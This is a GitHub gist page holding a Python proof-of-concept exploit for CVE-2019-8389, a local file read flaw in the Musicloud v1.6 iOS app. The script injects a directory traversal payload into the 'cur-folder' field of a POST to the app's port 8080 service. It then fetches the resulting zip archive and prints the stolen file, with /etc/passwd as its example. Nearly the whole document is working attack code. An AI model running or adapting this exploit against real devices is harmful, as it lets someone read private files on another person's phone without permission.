Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
[CVE-2019-8389] An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application
#!/usr/bin/python
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan
import sys
import requests
def usage():
print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n"
try:
ip = sys.argv[1]
path = sys.argv[2]
downfile = path.split('/')[::-1][0]
cur_fold = '../../../../../../..'+path[:-len(downfile)]
print '''
Musicloud v1.6 iOS - Local File Read exploit
CVE: CVE-2019-8389
Author: Shawar Khan ( @shawarkhanethicalhacker )
'''
def create_archive(file,payload):
post_data = {
"downfiles" : file,
"cur-folder" : payload
}
print "[+] Injecting Payload..."
try:
inj_status = requests.post('http://'+str(ip)+':8080/download.script',data=post_data)
if "MusicPlayerArchive.zip" in inj_status.text and inj_status.status_code==200:
print "[+] Payload successfully injected"
elif inj_status.status_code==404:
print "[+] Payload injection failed, File not found"
exit()
else:
print "[+] Payload injection failed!"
exit()
except(requests.exceptions.ConnectionError) as err:
print '[+] Payload injection failed! Connection refused.'
exit()
def retrieve_content():
print "[+] Retrieving MusicPlayerArchive.zip"
zip_content = requests.get('http://'+str(ip)+':8080/MusicPlayerArchive.zip')
if zip_content.status_code==200:
print "[+] Successfully retrieved MusicPlayerArchive.zip!\n\n[i] Printing content of %s:\n"%path
archive = zip_content.text.splitlines()
for i in range(2):
archive.pop()
archive.pop(0)
print '\n'.join(archive)
else:
print "[+] Error retrieving content!"
create_archive(downfile,cur_fold)
retrieve_content()
except(IndexError):
usage()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.